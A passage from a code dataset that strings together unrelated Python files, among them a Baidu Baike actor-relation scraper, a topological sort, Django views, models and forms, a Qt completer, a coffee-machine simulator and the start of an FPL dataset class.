print('timeout:'+url)\n # return None\n res = []\n soup = bs4.BeautifulSoup(data, 'html.parser')\n tags = soup.find_all('ul', attrs={'class': 'slider maqueeCanvas'})\n for tag in tags:\n soup2 = bs4.BeautifulSoup(str(tag), 'html.parser')\n tag2 = soup2.find_all('div', attrs={'class': 'name'})\n if len(tag2) == 0:\n continue\n dict = {}\n for i in tag2:\n if not i.em:\n continue\n full = i.text\n name = i.em.text\n len1 = len(full)\n len2 = len(name)\n relations = full[0:len1 - len2]\n dict_tmp = {relations: name}\n res.append(dict_tmp)\n # print(relations)\n return res\n\ndef get_movieurl_old1(data):\n \"\"\"\n 解析得到movie——url列表\n :param data:\n :return: list\n \"\"\"\n url = []\n # if data == None:\n # print('timeout:'+star_url)\n # return None\n soup = bs4.BeautifulSoup(data, 'html.parser')\n # get_name = soup.find_all('dd', attrs={'class': 'lemmaWgt-lemmaTitle-title'})\n # if len(get_name) == 0:\n # # print(path1)\n # continue\n # main_name = get_name[0].h1.text\n # print(main_name)\n tags = soup.find_all('div', attrs={'class': 'star-info-block works'})\n # tags = soup.find_all('ul', attrs={'class':'slider maqueeCanvas'})\n\n for tag in tags:\n soup2 = bs4.BeautifulSoup(str(tag), 'html.parser')\n tag2 = soup2.find_all('ul', attrs={'class': 'slider maqueeCanvas'})\n if len(tag2) == 0:\n continue\n for i in tag2:\n soup3 = bs4.BeautifulSoup(str(i), 'html.parser')\n tag3 = soup3.find_all('a', attrs={'href': True})\n for j in tag3:\n name = j.text.strip('\\n')\n # print(name)\n item = j['href']\n # print(item)\n if item[0] != '/':\n movie_url = item\n else:\n movie_url = tmp + item\n # print(movie_url)\n url.append(movie_url)\n # 下载电影html\n # if name == '' or name == None:\n # continue\n # else:\n # data = test.load(movie_url)\n # test.write_html(main_name.replace('/', ' ') + '-' + name.replace('/', ' '), data)\n # n = n + 1\n # print(n)\n # print(url)\n return url\n\ndef get_movieurl(data):\n \"\"\"\n 更新规则,从代表总品的列表里获取\n :param data:\n :return:\n \"\"\"\n url = []\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n tag1 = soup1.find('dl',attrs={'class':'basicInfo-block basicInfo-right'})\n num = -1\n if not tag1:\n return None\n # else:\n soup2 = bs4.BeautifulSoup(str(tag1), 'html.parser')\n tags2 = soup2.find_all('dt', attrs={'class': 'basicInfo-item name'})\n tags3 = soup2.find_all('dd', attrs={'class': 'basicInfo-item value'})\n for tag2 in tags2:\n # print(tag2.text.strip('\\n'))\n if tag2.text != '代表作品' and num==len(tags2)-2:\n num=-1\n else:\n if tag2.text == '代表作品':\n # print('here')\n num=num+1\n break\n else:\n num=num+1\n if num != -1:\n mark = tags3[num]\n soup3 = bs4.BeautifulSoup(str(mark), 'html.parser')\n tags4 = soup3.find_all('a', attrs={'target':'_blank'})\n for tag4 in tags4:\n url_tmp = tag4['href']\n if url_tmp[0] == '/':\n movie_url = tmp + url_tmp\n elif url_tmp[1] == 'h':\n movie_url = url_tmp\n else:\n continue\n url.append(movie_url)\n else:\n return None\n return url\n\ndef get_showurl(data):\n \"\"\"\n 解析明星html得到show——url列表\n :param data: 明星的html数据\n :return: list\n \"\"\"\n res = []\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n tags1 = soup1.find_all('table', attrs={'class': 'cell-module'})\n if (len(tags1) == 0):\n return None\n tags1 = tags1[0]\n soup2 = bs4.BeautifulSoup(str(tags1), 'html.parser')\n tags2 = soup2.find_all('a', attrs={'href': True})\n if (len(tags2) == 0):\n return None\n for tag2 in tags2:\n # 每个循环一个url(一个show记录),解析并添加到relation_set\n show_name = tag2.text.strip('\\n')\n url = tag2['href']\n if url[0] == '/':\n show_url = tmp + url\n elif url[1] == 'h':\n show_url = url\n else:\n continue\n res.append(show_url)\n return res\n\n\n# get_movie\ndef analysis_movieurl(url,movie_path, file_name):\n \"\"\"\n 接卸movie——url并且写html文件\n :param url: movie的url\n :param movie_path: 写html的路径\n :param file_name: html的文件名\n :return: set\n \"\"\"\n relation = set()\n data = lurl.load(url)\n if data == None:\n print('timeout:'+url)\n with open('log','a',encoding='utf-8') as f:\n f.write('movie_url load 失败:' + str(file_name) + '>----->' + url + '\\n')\n return None\n lurl.write_html(file_name, data, movie_path)\n # p.apply_async(lurl.write_html, args = (file_name,data,movie_path))\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n tag1 = soup1.find('div',attrs={'class':'basic-info cmn-clearfix'})\n num=-1\n if not tag1:\n return None\n # else:\n soup2 = bs4.BeautifulSoup(str(tag1), 'html.parser')\n tags2 = soup2.find_all('dt',attrs={'class':'basicInfo-item name'})\n tags3 = soup2.find_all('dd',attrs={'class':'basicInfo-item value'})\n\n for tag2 in tags2:\n # print(tag2.text.strip('\\n'))\n if tag2.text != '主    演' and num==len(tags2)-2:\n num=-1\n else:\n if tag2.text == '主    演':\n # print('here')\n num=num+1\n break\n else:\n num=num+1\n # print(num)\n if num!=-1:\n zhuyan = tags3[num]\n else:\n return None\n list = re.split(r'[,、]', zhuyan.text.strip('\\n'))\n # print(list)\n # print(type(list))\n for i in range(len(list)):\n list[i] = re.sub('[\\[\\d\\]\\n\\xa0]|[\\((][^\\))]+[\\))]$', '', list[i])\n # list[i]=list[i].rstrip('\\n').rstrip('[').rstrip('(')\n relation = set(list)\n return relation\n\n# get_show\ndef analysis_showurl(url, show_path, file_name):\n \"\"\"\n 解析showurl并写html\n :param url: 要解析的url\n :param show_path: 写html的路径\n :param file_name: 写html的文件名\n :return: set\n \"\"\"\n # p = Pool(1)\n data = lurl.load(url)\n if data == None:\n print('timeout:'+url)\n with open('log','a',encoding='utf-8') as f:\n f.write('show_url load 失败:' + str(file_name) + '>----->' + url + '\\n')\n return None\n # lurl.write_html(file_name, data, show_path)\n # p.apply_async(lurl.write_html,args=(file_name,data,show_path))\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n # print(soup1)\n tag1 = soup1.find('dl', attrs={'class': 'basicInfo-block basicInfo-left'})\n # tag1 = soup1.find('div', attrs={'class': 'basic-info cmn-clearfix'})\n if not tag1:\n return None\n relation = set()\n num = -1\n soup2 = bs4.BeautifulSoup(str(tag1), 'html.parser')\n tags2 = soup2.find_all('dt', attrs={'class': True})\n # print(tags2)\n tags3 = soup2.find_all('dd', attrs={'class': True})\n # print(tags3)\n for tag2 in tags2:\n if tag2.text.strip('\\n') != '主持人' and num == len(tags2) - 2:\n num = -1\n else:\n if tag2.text.strip('\\n') == '主持人':\n num = num + 1\n break\n else:\n num = num + 1\n # print(num)\n # print(num)\n if num != -1:\n zhuchiren = tags3[num]\n # print(zhuchiren)\n else:\n return None\n list = re.split(r'[,、]', zhuchiren.text.strip('\\n'))\n # print(list)\n # print(type(list))\n for i in range(len(list)):\n list[i] = re.sub('[\\[\\d\\]\\n\\xa0]|[\\((][^\\))]+[\\))]$', '', list[i])\n # list[i]=list[i].rstrip('\\n').rstrip('[').rstrip('(')\n # relation = set(list)\n relation = set(list)\n return relation","sub_path":"recommend_baike_system/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":8638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"578504219","text":"#Jonathan Nunes\r\n#CS 435\r\n#Project 2 Part 2\r\n#Top Sort Class\r\n\r\nclass TopSort:\r\n\r\n def kahns(self, graph):\r\n \"\"\"Does a valid topological sort of the graph using Kahn's algorithm.\"\"\"\r\n dependencies = [0] * len(graph.nodes)\r\n for node in graph.nodes:\r\n for adj in graph.adjacency[node][1:]:\r\n dependencies[adj] += 1\r\n\r\n ret = []\r\n queue = []\r\n for node in graph.nodes:\r\n if dependencies[node] == 0:\r\n queue.append(node)\r\n\r\n while queue:\r\n\r\n temp = queue.pop(0)\r\n ret.append(temp)\r\n\r\n for node in graph.adjacency[temp]:\r\n dependencies[node] -= 1\r\n\r\n if dependencies[node] == 0:\r\n queue.append(node)\r\n\r\n return ret\r\n\r\n def mDFS(self, graph):\r\n \"\"\"Does a valid topological sort of the graph using mDFS algorithm.\"\"\"\r\n stack = []\r\n visited = [False] * len(graph.nodes)\r\n\r\n for node in graph.nodes:\r\n if visited[node] == False:\r\n self.mDFSHelper(graph, node, visited, stack)\r\n \r\n return stack\r\n\r\n def mDFSHelper(self, graph, node, visited, stack):\r\n \"\"\"Helper function for the mDFS function.\"\"\"\r\n visited[node] = True\r\n\r\n for neighbor in graph.adjacency[node]:\r\n if visited[neighbor] == False:\r\n self.mDFSHelper(graph, neighbor, visited, stack)\r\n \r\n stack.append(node)\r\n","sub_path":"project2 revised/TopSort.py","file_name":"TopSort.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"347986248","text":"# -*- coding: utf-8 -*-\nfrom annoying.decorators import render_to\nfrom cms.utils import get_language_from_request, get_page_from_request\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\nfrom library.models import Person\n\ndef get_category_from_request(request, use_session=True):\n \"\"\"Get category for post at current cms page\n \"\"\"\n try:\n key = request.session.get('referer', 'page_path')\n if use_session:\n request.path = request.session[key]\n page = get_page_from_request(request)\n except KeyError:\n raise Http404('You are behind django-cms')\n language = get_language_from_request(request)\n cms_category_plugins = page.cmsplugin_set.filter(\n Q(language=language) &\n Q(plugin_type__exact='PersonListOnPagePlugin')\n )\n if not cms_category_plugins.count():\n raise Http404('Category not found')\n return cms_category_plugins[0].personsincategory.category\n\n\n@render_to()\ndef show(request, pk, person_slug):\n request.session['page_path'] = request.path\n category = get_category_from_request(request)\n person = get_object_or_404(Person, pk=pk, slug=person_slug)\n persons = Person.objects.filter(category__in = person.category.all()).distinct()\n tags = [t.strip() for t in person.tags.split(',') if t.strip() ]\n return {\n 'category': category,\n 'person' : person,\n 'persons' : persons.exclude(pk = person.pk),\n 'persons_with_current': persons,\n 'view_title': person.name,\n 'tags': tags,\n 'TEMPLATE': category.template,\n }\n","sub_path":"library/views/persons.py","file_name":"persons.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"20909072","text":"# coding: utf-8\n__author__ = 'PlayJokes'\nimport database\nimport text_file\n\nclass SentenceManager:\n def __init__(self, form):\n if form == 'database':\n self.container = database.DataBase()\n elif form == 'text':\n self.container = text_file.TextFile('./words.data')\n\n def insertSentence(self, sentence, author, source):\n self.container.insertSentence(sentence, author, source)\n","sub_path":"tools/spider/sentence_manager.py","file_name":"sentence_manager.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"631934334","text":"from . import QtCore, QtWidgets\nimport six\nif six.PY3:\n unicode = str\n\n\nclass LocationWidget(QtWidgets.QLineEdit):\n \"\"\"The widget with page location.\n\n It has its own completer that tries to work similarly to Sublime Text fuzzy search.\n Otherwise, it is based on standard line edit.\n \"\"\"\n\n class Completer(QtWidgets.QCompleter):\n def __init__(self, storage):\n super(LocationWidget.Completer, self).__init__()\n self.storage = storage\n self.setModel(QtCore.QStringListModel())\n\n def splitPath(self, path):\n if len(str(path)) > 2:\n self.model().setStringList(self.storage.fuzzy_find_names(unicode(path)))\n else:\n self.model().setStringList([])\n return [\"\"]\n\n def __init__(self, storage, parent=None):\n super(LocationWidget, self).__init__(parent)\n self.completer = LocationWidget.Completer(storage)\n self.setCompleter(self.completer)\n","sub_path":"hlava/qtui/location_widget.py","file_name":"location_widget.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"319484962","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/4 12:56 AM\n# @Author : zhongch4g\n# @Site : \n# @File : 639. Word Abbreviation.py\n# @Software: IntelliJ IDEA\n\n\nclass Solution:\n \"\"\"\n @param dict: an array of n distinct non-empty strings\n @return: an array of minimal possible abbreviations for every word\n \"\"\"\n def wordsAbbreviation(self, dict):\n ans = [0] * len(dict)\n abbr = {}\n round = 1\n for i in range(len(dict)):\n ans[i] = self.get_abbr(dict[i], round)\n abbr[ans[i]] = abbr.get(ans[i], 0) + 1\n\n\n while True:\n unique = True\n round += 1\n for i in range(len(dict)):\n if abbr[ans[i]] > 1:\n ans[i] = self.get_abbr(dict[i], round)\n abbr[ans[i]] = abbr.get(ans[i], 0) + 1\n unique = False\n if unique:\n break\n return ans\n\n\n def get_abbr(self, word, pre):\n if pre + 2 >= len(word):\n return word\n\n return word[:pre] + str(len(word) - pre - 1) + word[-1]\n","sub_path":"Lintcode/639. Word Abbreviation.py","file_name":"639. Word Abbreviation.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"366989891","text":"from django.contrib.admin.widgets import AdminFileWidget\nfrom django.utils.translation import ugettext as _\nfrom django.utils.safestring import mark_safe\nfrom django import forms\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.contrib.sites.models import Site\nfrom django.template.defaultfilters import slugify\nfrom django.conf import settings\nfrom simplemathcaptcha.fields import MathCaptchaField\n\nfrom .models import ContactPlus\n\nfrom .signals import *\n\nclass ContactFormPlus(forms.Form):\n \n def __init__(self, contactFormInstance, request, *args, **kwargs):\n super(ContactFormPlus, self).__init__(*args, **kwargs)\n if 'instance' not in kwargs:\n for extraField in contactFormInstance.extrafield_set.all():\n if extraField.fieldType == 'CharField':\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'BooleanField':\n self.fields[slugify(extraField.label)] = forms.BooleanField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'EmailField':\n self.fields[slugify(extraField.label)] = forms.EmailField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'DecimalField':\n self.fields[slugify(extraField.label)] = forms.DecimalField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'FloatField':\n self.fields[slugify(extraField.label)] = forms.FloatField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'IntegerField':\n self.fields[slugify(extraField.label)] = forms.IntegerField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'IPAddressField':\n self.fields[slugify(extraField.label)] = forms.IPAddressField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'auto_Textarea':\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial=extraField.initial,\n widget=forms.Textarea, \n required=extraField.required)\n elif extraField.fieldType == 'auto_hidden_input':\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial = extraField.initial,\n widget=forms.HiddenInput, \n required=False)\n elif extraField.fieldType == 'auto_referral_page':\n lInitial = \"No referral available.\"\n if request:\n lInitial = request.META.get('HTTP_REFERER', 'No referral available.')\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial = lInitial, #NOTE: This overwrites extraField.initial! \n widget=forms.HiddenInput, \n required=False) \n elif extraField.fieldType == 'MathCaptcha':\n self.fields[slugify(extraField.label)] = MathCaptchaField(\n label=extraField.label,\n initial = extraField.initial,\n required=True) \n elif extraField.fieldType == 'auto_GET_parameter':\n lInitial = \"Key/value parameter not available.\"\n if request:\n lInitial = request.GET.get(slugify(extraField.label), 'n/a')\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial = lInitial, #NOTE: This overwrites extraField.initial! \n widget=forms.HiddenInput, \n required=False)\n \n \n \n def send(self, recipient_email, request, instance=None):\n current_site = Site.objects.get_current()\n if instance:\n order = ContactPlus.objects.get(id=instance.id).extrafield_set.order_by('inline_ordering_position')\n ordered_dic_list = []\n\n for field in order:\n key = slugify(field.label)\n value = self.cleaned_data.get(key, '(no input)')\n ordered_dic_list.append({field.label: value})\n \n \n # Automatically match reply-to email adress in form \n tmp_headers = {}\n try:\n reply_email_label = getattr(settings, 'CONTACT_PLUS_REPLY_EMAIL_LABEL', None)\n if reply_email_label is not None:\n tmp_headers.update({'Reply-To': self.cleaned_data[reply_email_label]})\n except:\n pass\n \n email_message = EmailMessage(\n \"[\" + current_site.domain.upper() + \"]\",\n render_to_string(\"cmsplugin_contact_plus/email.txt\", { 'data': self.cleaned_data, \n 'ordered_data': ordered_dic_list,\n 'instance': instance,\n }),\n from_email = getattr(settings, 'DEFAULT_FROM_EMAIL', None),\n to = [recipient_email, ],\n headers = tmp_headers,)\n email_message.send(fail_silently=True)\n \n contact_message_sent.send(sender=self, data=self.cleaned_data)\n \n","sub_path":"cmsplugin_contact_plus/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"361857265","text":"from threading import Thread\nfrom queue import Queue, Empty\nfrom functools import partial\nfrom time import sleep, perf_counter\n\nclass SenseoSimulator():\n def __init__(self, status_change_callback):\n self.machine_thread = MachineThread(self.status_change_callback)\n self.machine_thread.start()\n\n self.ordered_cups = 0\n\n # The function to call when the state of the machine changes\n self.status_change_callback = status_change_callback\n\n self.wait_time = 0.1\n\n def send_status(self):\n self.status_change_callback({\n \"state\": self.machine_thread.state,\n \"ordered_cups\": self.ordered_cups,\n \"led\": self.machine_thread.led\n })\n\n def status_change_callback(self):\n if self.ordered_cups > 0 and self.machine_thread.state == \"ready\":\n sleep(self.wait_time)\n self.try_brew()\n self.ordered_cups = 0\n\n self.send_status()\n\n def turn_on(self):\n if self.machine_thread.state == \"off\":\n self.machine_thread.commands.put(\"power\")\n self.ordered_cups = 0\n\n def turn_off(self):\n if self.machine_thread.state != \"off\":\n self.machine_thread.commands.put(\"power\")\n self.ordered_cups = 0\n\n def stop(self):\n if self.machine_thread.state in (\"brewing\", \"heating\"):\n self.ordered_cups = 0\n if self.machine_thread.state == \"brewing\":\n # Have you tried turning it off and on again?\n self.machine_thread.commands.put(\"power\")\n sleep(self.wait_time)\n self.machine_thread.commands.put(\"power\")\n\n def brew_one(self):\n self.ordered_cups = 1\n self.try_brew()\n\n def brew_two(self):\n self.ordered_cups = 2\n self.try_brew()\n\n def try_brew(self):\n if self.machine_thread.state == \"off\":\n self.machine_thread.commands.put(\"power\")\n elif self.machine_thread.state == \"ready\":\n self.machine_thread.commands.put(\"brew_\" + (\"one\" if self.ordered_cups == 1 else \"two\"))\n\n\nclass MachineThread(Thread):\n def __init__(self, status_change_callback):\n super().__init__()\n self.state = \"off\"\n self.temperature = 0\n self.remaining_brew_time = 0\n self.led = False\n self.remaining_led_blink_time = 0\n\n self.heat_rate = 0.1\n self.off_cool_rate = 0.05\n self.brew_rate = 0.1\n self.brew_cool_rate = 0.05\n self.led_blink_period = 0.5\n self.sleep_time = 0.1\n\n self.status_change_callback = status_change_callback\n self.commands = Queue()\n self.handlers = {\n \"power\": self.power,\n \"brew_one\": partial(self.brew, 1),\n \"brew_two\": partial(self.brew, 2)\n }\n\n def run(self):\n last_time = perf_counter()\n while True:\n try:\n command = self.commands.get(block=True, timeout=self.sleep_time)\n self.handlers[command]()\n except Empty:\n pass\n current_time = perf_counter()\n dt = current_time - last_time\n last_time = current_time\n self.update(dt)\n\n def power(self):\n if self.state == \"off\":\n self.state = \"heating\"\n self.led = True\n self.status_change_callback()\n else:\n self.state = \"off\"\n self.remaining_brew_time = 0\n self.led = False\n self.status_change_callback()\n\n def brew(self, quantity):\n if self.state == \"ready\":\n self.state = \"brewing\"\n self.remaining_brew_time = quantity\n self.status_change_callback()\n\n def update(self, dt):\n if self.state in (\"heating\", \"brewing\") and self.remaining_led_blink_time <= 0:\n self.led = not self.led\n self.remaining_led_blink_time = self.led_blink_period\n self.status_change_callback()\n\n if self.state == \"heating\":\n self.temperature += dt * self.heat_rate\n self.remaining_led_blink_time -= dt\n\n if self.temperature >= 1:\n self.state = \"ready\"\n self.led = True\n self.status_change_callback()\n\n elif self.state == \"brewing\":\n self.remaining_brew_time -= dt * self.brew_rate\n self.temperature -= dt * self.brew_cool_rate\n\n if self.remaining_brew_time <= 0:\n self.state = \"heating\"\n self.status_change_callback()\n\n elif self.state == \"off\":\n self.temperature -= dt * self.off_cool_rate\n self.temperature = max(0, self.temperature)\n","sub_path":"backend/SenseoSimulator.py","file_name":"SenseoSimulator.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"561715561","text":"#!/usr/bin/env python\n\nimport csv\n\nwith open('data/knights.csv') as knights_in:\n\n # Create CSV reader\n rdr = csv.reader(knights_in)\n\n # Read and unpack records one at a time; each record is a list\n for name, title, color, quest, comment, number, ladies in rdr:\n print('{:4s} {:9s} {}'.format(\n title, name, quest\n ))\n","sub_path":"serializing_data/csv_read.py","file_name":"csv_read.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"529281433","text":"import sqlite3\nfrom django.urls import reverse\nfrom django.shortcuts import redirect, render\nfrom ..connection import Connection\nfrom breadapp.models import Bread, model_factory\n\ndef bread_list(request):\n if request.method == \"GET\":\n '''connect to data base and grab the entire list of breads then doa fetch all and send those breads tot he html page'''\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = model_factory(Bread)\n\n db_cursor = conn.cursor()\n \n db_cursor.execute(\"\"\"\n Select * from breadapp_bread\n \"\"\")\n\n breads = db_cursor.fetchall()\n\n template = \"bread/bread_list.html\"\n context = {\n 'breads': breads\n }\n\n return render(request, template, context)\n if request.method == \"POST\":\n ''' check that it is a post method and then add the bread to the breadapp_bread table, afterwards get all the breads again!!!!'''\n form_data = request.POST\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = model_factory(Bread)\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n INSERT into breadapp_bread (name, region)\n values (?, ?)\n \"\"\", (form_data[\"name\"], form_data[\"region\"]))\n \n return redirect(reverse('breadapp:breads'))\n\n","sub_path":"breadapp/views/bread/bread_list.py","file_name":"bread_list.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"364652270","text":"#! Python3\r\n\r\nfrom jinja2 import Environment, FileSystemLoader\r\nimport docx\r\nimport os, sys, openpyxl, pprint, random\r\nfrom openpyxl.styles import Font, PatternFill, Border, Side\r\nfrom time import strftime\r\nfrom openpyxl.chart import (\r\n Reference,\r\n Series,\r\n BarChart3D,\r\n BarChart\r\n )\r\n\r\n''' Column Headers from EZPlan Output file\r\nPI ID & Title: Col 4,\r\nActivity ID: Col 5,\r\nPI ID: Col 6,\r\nTK ID: Col 7,\r\nWork Type: Col 8,\r\nCrop: Col 13,\r\nPlanned SD: Col 16,\r\nAllocated SD: Col 17,\r\nPlanned $: Col 20,\r\nAllocated $: Col 21,\r\nNamed Resource: Col 22,\r\nActivity Comments: Col 23,\r\nPortfolio: Col 24\r\n'''\r\n\r\ndef color():\r\n hecks = \"ABCDEF0123456789\"\r\n randomColor = \"\"\r\n for i in range(0, 6):\r\n randomColor += (hecks[random.randint(0, len(hecks)-1)])\r\n return randomColor\r\nrColor = color()\r\n\r\nPATH = os.path.dirname(os.path.abspath(__file__))\r\nTEMPLATE_ENVIRONMENT = Environment(\r\n autoescape=False,\r\n loader=FileSystemLoader(os.path.join(PATH, 'templates')),\r\n trim_blocks=False)\r\n\r\ndef render_template(template_file, context):\r\n return TEMPLATE_ENVIRONMENT.get_template('index.html').render(context)\r\n\r\ndoc = docx.Document('demo.docx')\r\nsentence = []\r\nfor i in range(0, len(doc.paragraphs)-1):\r\n sentence.append(doc.paragraphs[i].text)\r\n\r\ndef create_index_html():\r\n fname = \"output.html\"\r\n title = sys.argv[1]\r\n urls = ['http://example.com/1', 'http://example.com/2', 'http://example.com/3']\r\n text = ['hello', 'world']\r\n apples = {\r\n 'red': 'sweet',\r\n 'green': 'bitter'\r\n }\r\n context = {\r\n 'links':urls,\r\n 'text':text,\r\n 'dict': apples,\r\n 'sentence': sentence,\r\n 'title': title,\r\n 'color': rColor\r\n }\r\n #\r\n with open(fname, 'w') as f:\r\n html = render_template('index.html', context)\r\n f.write(html)\r\n\r\n\r\ndef main():\r\n create_index_html()\r\n\r\n######\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n \r\n","sub_path":"proba.py","file_name":"proba.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"73804444","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass Place(models.Model):\n _NONDISPLAYABLE = ['id', 'image', 'slug', 'latitude', 'longitude']\n _NONSEARfrCHABLE = ['street', 'building', 'description']\n _THUMBNAIL = ['price', 'street', 'building', 'city', 'type']\n _SLIDERS = ['price', 'rooms', 'total_footage', 'living_footage', 'floor_number']\n _CHECKBOXES = ['city', 'region', 'planning', 'wall_type', 'type']\n\n city = models.CharField(max_length=75, verbose_name=\"Город\", blank=True, null=True)\n street = models.CharField(max_length=75, verbose_name=\"Улица\", blank=True, null=True)\n building = models.CharField(max_length=75, verbose_name=\"Дом\", blank=True, null=True)\n region = models.CharField(max_length=75, verbose_name=\"Район\", blank=True, null=True)\n\n rooms = models.IntegerField(verbose_name=\"Количество комнат\", blank=True, null=True)\n total_footage = models.IntegerField(verbose_name=\"Общая площадь\", blank=True, null=True)\n living_footage = models.IntegerField(verbose_name=\"Жилая площадь\", blank=True, null=True)\n floor_number = models.IntegerField(verbose_name=\"Этаж\", blank=True, null=True)\n planning = models.CharField(max_length=75, verbose_name=\"Планировка\", blank=True, null=True)\n wall_type = models.CharField(max_length=75, verbose_name=\"Тип стен\", blank=True, null=True)\n price = models.IntegerField(verbose_name=\"Цена\", blank=True, null=True)\n\n # House or apartment\n type = models.CharField(max_length=75, verbose_name=\"Тип\")\n\n ## image = models.ImageField(upload_to='rentsite/', verbose_name=\"Изображение\", blank=True, null=True)\n slug = models.SlugField(unique=True)\n description = models.TextField(max_length=1000, verbose_name=\"Описание\", blank=True, null=True)\n\n # Coords for ympas\n latitude = models.FloatField(verbose_name=\"Широта\", blank=True, null=True)\n longitude = models.FloatField(verbose_name=\"Долгота\", blank=True, null=True)\n\n def __str__(self):\n return self.slug\n\n def get_thumbnail_fields_list(self):\n answer = list()\n for field in Place._meta.fields:\n if field.name in Place._THUMBNAIL:\n answer.append((field.name, field.value_to_string(self)))\n\n return answer\n\n def get_verbose_fields_list(self):\n answer = list()\n for field in Place._meta.fields:\n if field.name not in Place._NONDISPLAYABLE:\n answer.append((field.verbose_name, field.value_to_string(self)))\n\n return answer\n\n def get_coords(self):\n answer = dict()\n\n answer['latitude'] = self.latitude\n answer['longitude'] = self.longitude\n return answer\n\n def lies_into_polygon(self, polygon):\n x = self.longitude\n y = self.latitude\n\n if x is None:\n return False\n\n n = len(polygon)\n inside = False\n\n p1x,p1y = polygon[0]\n for i in range(n+1):\n p2x,p2y = polygon[i % n]\n if y > min(p1y,p2y):\n if y <= max(p1y,p2y):\n if x <= max(p1x,p2x):\n if p1y != p2y:\n xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x\n if p1x == p2x or x <= xints:\n inside = not inside\n p1x,p1y = p2x,p2y\n\n return inside\n\n\n\n\n\n @staticmethod\n def get_search_checkboxes():\n answer = dict()\n for field in Place._meta.fields:\n if field.name in Place._CHECKBOXES:\n answer[field.name] = field.verbose_name, list(set([x[field.name] for x in Place.objects.values(field.name)]))\n\n return answer\n\n @staticmethod\n def get_search_sliders():\n answer = dict()\n for field in Place._meta.fields:\n if field.name in Place._SLIDERS:\n answer[field.name] = field.verbose_name, \\\n [Place.objects.all().aggregate(models.Min(field.name)).values()[0],\n Place.objects.all().aggregate(models.Max(field.name)).values()[0]]\n\n return answer\n","sub_path":"rentsite/rent_site/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"380294482","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('agent', '0023_auto_20151120_2009'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='allocation_distance',\n field=models.DecimalField(null=True, max_digits=5, decimal_places=2),\n ),\n ]\n","sub_path":"backend/agent/migrations/0024_order_allocation_distance.py","file_name":"0024_order_allocation_distance.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614392911","text":"import pandas as pd\nimport numpy as np\nimport utils.utils as ut\n\nfrom pathlib import PosixPath, WindowsPath\nfrom sklearn.preprocessing import FunctionTransformer,\\\n StandardScaler\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.model_selection import train_test_split\n\n\nclass Dataset(object):\n \"\"\"\n The dataset object for FPL optimiser\n It supports fetching the latest data from the database or from csv\n\n Args:\n window (int) - The game week window size of the features.\n For example, 10 means 10 weeks of metrics\n will be used as features\n \"\"\"\n\n def __init__(self, window=10, source=\"csv\", path=None, conn=None):\n self.dataset = None\n self.players = None\n self.transformed_dataset = None\n self.dropped_columns = None\n self.window = window\n self.path = path\n 